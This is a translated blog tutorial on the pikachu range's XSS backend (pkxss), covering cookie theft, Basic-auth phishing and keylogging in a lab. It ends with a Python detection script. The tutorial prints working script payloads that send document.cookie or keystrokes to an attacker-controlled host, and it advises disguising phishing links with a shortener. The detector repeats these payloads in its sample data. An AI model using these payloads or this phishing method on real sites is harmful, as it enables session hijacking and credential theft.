Hands-on practice with the XSS backend of the pikachu management tool

Important note up front:

Attention: There is no good or bad technology; the key lies in the people or organizations that use it. Network security technology is a double-edged sword. As network security people, although we cannot control whether the hat on our head turns green, we can keep it from turning black; no matter how much material temptation we face or how difficult the dilemma, we must never give up our original ideal of becoming a top white hat. Along the way we may not be able to use our technology to advance the cause of network security, but we must not and cannot stand on the opposite side of its development.

Warning: This article is limited to technical exchange; using the techniques it covers for any illegal or criminal activity is prohibited, and anyone who does so bears the consequences. The author also recommends that all network security practitioners familiarize themselves with, and commit to memory, our country's network security laws and regulations, which is part of being responsible for their own careers.

One: Introduction to the XSS backend of the pikachu management tool

The XSS backend of the pikachu management tool is a platform that helps learners understand the principles and harm of XSS vulnerabilities through three hands-on experiments: cookie stealing and use, phishing attacks, and keystroke logging. It is designed to ground the theory in practice so that learners can defend against XSS vulnerabilities better.

XSS backend login page:

XSS backend main page:

Two: Start the XSS backend

Method 1: Go directly to the management tool module of the pikachu range -> enter the XSS backend. (On first use, you need to create the database first.)

Method 2: The XSS backend is a stand-alone directory in the pikachu range files: pkxss. If you do not want to deploy the whole pikachu range, you can deploy the pkxss directory on its own on the attacking host and build the XSS backend separately. (For example, the author deploys it in phpStudy in a virtual machine; the deployment method is the same as for the range. Readers who are unsure can read the author's article on range deployment.)

Three: Practical Experimental Demonstration

  • Cookie stealing

GET type:

Schematic:

Step 1: Modify the configuration file

1) Enter the pkxss directory, find xcookie, and open cookie.php to modify the configuration (E:\phpstudy_pro\WWW\Test\pkxss\xcookie\cookie.php).

Modify the URL in the box: this URL is the address the page is redirected to, and it should be a trusted address. In other words, once the attack code is triggered in the victim's browser, the page jumps (refreshes) to this URL. The purpose is to reduce or even remove the victim's suspicion about the page jump caused by the attack. (The author deploys pikachu in the local phpStudy at E:\phpstudy_pro\WWW\Test\pikachu-master, so this URL means: when attacked, the page jumps to the home page of the pikachu range.)

Step 2: Construct the attack code

1) Construct the attack code that obtains the cookie, inject it through the XSS vulnerability into a site that the target host is likely to browse and that has the vulnerability, and wait for the attack to succeed.

To help readers understand, the stored XSS vulnerability in the pikachu range is used for the demonstration.

1) Check whether the cookie acquisition module of the XSS platform has historical data.

2) Construct the attack code: <script>document.location = 'http://xxx.xxx.xxx.xxx/Pikachu-master/pkxss/xcookie/cookie.php?cookie=' + document.cookie;</script>

(Note: the page http://xxx.xxx.xxx.xxx/Pikachu-master/pkxss/xcookie/cookie.php in the attack code is where the code sends the user's cookie once it runs in the user's browser. This URL is, of course, controlled by the attacker.)

Step 3: Inject the code into the page through the input box or web page URL

Note: Since the input box has a character length limit, you need to open the developer tools (right-click -> Inspect) and change the character length limit.

Step 4: View the records

POST type:

Principle:

The basic principle of the POST type is much like the GET type. The main difference is that the parameters are submitted via a form and cannot be passed in the URL, so the attacker cannot embed the malicious code in a URL. The attacker therefore has to construct a form; when the user clicks the attacker's form link, the user's browser submits the request on the attacker's behalf, and the subsequent steps are the same as for the GET type.

Step 1: Construct the form

1) Modify the configuration

Modify the file in the pkxss directory: pkxss/xcookie/post.html

  1. Fill the white box with the user server IP address and file path, for example: http://pikachu/pkxss/xcookie/pkxss_cookie_result.php
  2. Fill the yellow box with the IP address and file path of the machine controlled by the attacker: http://pikachu/pkxss/xcookie/cookie.php

Step 2: On the login page, enter the attack code in the attack box (the steps are the same as for the GET type): <script>document.location = 'http://xxx.xxx.xxx.xxx/Pikachu-master/pkxss/xcookie/cookie.php?cookie=' + document.cookie;</script>

Step 3: View the attack results:

  • Phishing attack

The idea of the phishing attack: the attacker sends a crafted link to the client. After the user clicks the link, a request is sent to the backend the attacker built in advance. On receiving the request, the backend returns a Basic authentication header to the client, asking for identity verification. If the user is not security-aware enough and enters sensitive information (username and password), that information is sent to the XSS backend controlled by the attacker.

Step 1: Configuration File

Configure fish.php in the pkxss/xfish directory: set the information in the red box of the picture to the backend address of the attacker-controlled file that receives the victim's information, for example http://pikachu/pkxss/xfish/xfish.php (the address of the author's local pikachu XSS backend management platform).

Step 2: Construct a phishing attack link

Note: The phishing backend has an interface (xfish.php) that receives the remote data; the account and password are received via the GET method and stored in the database. File path: pikachu/pkxss/xfish/xfish.php

Construct a link that accesses the attacker-controlled backend and returns Basic authentication; it can be an a tag, an img tag, a script tag, etc.

Note: To keep the constructed phishing link from being noticed by the victim, you can process the link with a link processing (short-URL) tool.

Link processing platform: http://tools.jb51.net/password/dwzcreate

For example:

Link 1: http://xxx.xxx.xxx/Pikachu-master/pkxss/xfish/fish.php

After processing by the platform: http://mrw.so/6oy3Hb

Link 2: <img src="http://xxx.xxx.xxx/Pikachu-master/pkxss/xfish/fish.php"></img>

Link 3: <script src="http://xxx.xxx.xxx/Pikachu-master/pkxss/xfish/fish.php"></script>

Step 3: Test in the pikachu range

1) Embed the constructed phishing link in the pikachu range and click submit; an input box pops up.

2) Enter the username: Classmate Beiming; password: 123456. Click Login.

Step 4: Check the backend results

  • Keylogger

Keylogging attack principle: the XSS vulnerability is used to inject attack code into the page; when the victim visits the page, any operation on the page is recorded, and the attack code sends the record to the attacker-controlled backend.

Step 1: Modify the configuration

1) Copy pkxss/rkeypress/rk.js from the pikachu range directory. Replace the content in the red box in the figure with the address of the attacker-controlled backend that receives the victim's keystroke log, such as: http://pikachu/pkxss/rkeypress/rkserver.php

2) Modify the rkserver.php file (path: pkxss/rkeypress/rkserver.php).

Set whether to allow cross-origin access to: all. [For an analysis of browser cross-origin access, see the author's blog post: ]

Step 2: Construct the attack code

<script src="http://xxx.xxx.xxx/Pikachu-master/pkxss/rkeypress/rk.js"></script>

Step 3: Verify in the pikachu range

    1. Inject the attack code into a page with an XSS vulnerability and wait for the victim to visit the page.

    2. The attacked user visits the page and adds a comment: Classmate Beiming, triggering the attack.

    3. Enter the XSS backend to view the captured keystrokes.
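The cookie-stealing, phishing and keylogger experiments above leave two traces a defender can look for: the injected markup arriving at the vulnerable site, and the victim's browser calling back to the pkxss cookie.php endpoint with document.cookie in the query string. The following detection logic is an added example (not part of the pikachu project) that flags both over constructed sample events; xxx.xxx.xxx.xxx is the placeholder attacker host used throughout this page.

```python
# Added example, not pikachu's own code: detect the pkxss payload patterns and
# cookie callbacks shown on this page. Sample events are constructed.
import re
from typing import List, Optional, Tuple
from urllib.parse import parse_qs, unquote_plus, urlsplit
# Inbound side (vulnerable site / WAF): payload arriving in a form field or query string.
INBOUND_RULES = [
    ("inline script reading document.cookie",
     re.compile(r"<script[^>]*>[^<]*document\.cookie", re.I)),
    ("remote script include",  # rk.js keylogger loader, or fish.php via <script src>
     re.compile(r"<script[^>]*\bsrc\s*=\s*['\"]?https?://", re.I)),
    ("remote img/iframe include",  # fish.php via <img src>
     re.compile(r"<(?:img|iframe)[^>]*\bsrc\s*=\s*['\"]?https?://", re.I)),
]
# Outbound side (proxy log): browser redirected to cookie.php?cookie=<document.cookie>.
COOKIE_ENDPOINT = re.compile(r"/cookie\.php$", re.I)
COOKIE_STRING = re.compile(r"^\s*[\w.-]+=[^;]*(?:;\s*[\w.-]+=[^;]*)*\s*$")

def check_inbound(form_body: str) -> List[str]:
    """Return the names of the payload rules matched by one URL-encoded body."""
    decoded = unquote_plus(form_body)  # one decode round is enough for these payloads
    return [name for name, rx in INBOUND_RULES if rx.search(decoded)]

def check_outbound(url: str) -> Optional[str]:
    """Flag a cookie.php request whose ?cookie= value looks like a cookie header."""
    parts = urlsplit(url)
    if not COOKIE_ENDPOINT.search(parts.path):
        return None
    values = parse_qs(parts.query).get("cookie", [])  # parse_qs decodes the values
    if any(COOKIE_STRING.match(v) for v in values):
        return f"cookie exfiltration to {parts.netloc}"
    return None

def scan(events: List[Tuple[str, str]]) -> List[Tuple[int, str]]:
    # Run both checks over (direction, text) events; return (event index, finding).
    findings = []
    for i, (direction, text) in enumerate(events):
        if direction == "in":
            findings.extend((i, name) for name in check_inbound(text))
        elif (hit := check_outbound(text)) is not None:
            findings.append((i, hit))
    return findings

SAMPLE_EVENTS = [  # constructed: stored-XSS submissions, then proxy-side requests
    ("in", "message=%3Cscript%3Edocument.location%3D%27http%3A%2F%2Fxxx.xxx.xxx.xxx%2FPikachu-master%2Fpkxss%2Fxcookie%2Fcookie.php%3Fcookie%3D%27%2Bdocument.cookie%3B%3C%2Fscript%3E"),
    ("in", "message=%3Cscript+src%3D%22http%3A%2F%2Fxxx.xxx.xxx.xxx%2FPikachu-master%2Fpkxss%2Frkeypress%2Frk.js%22%3E%3C%2Fscript%3E"),
    ("in", "message=hello+from+Beiming"),
    ("out", "http://xxx.xxx.xxx.xxx/Pikachu-master/pkxss/xcookie/cookie.php?cookie=PHPSESSID%3Dabc123%3B+level%3D1"),
    ("out", "http://pikachu/pkxss/xcookie/pkxss_cookie_result.php"),
]
```

The outbound check only fires when the cookie parameter actually carries name=value pairs, so the legitimate pkxss_cookie_result.php request and an empty callback are not reported.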


Source: blog.csdn.net/weixin_49769267/article/details/131995602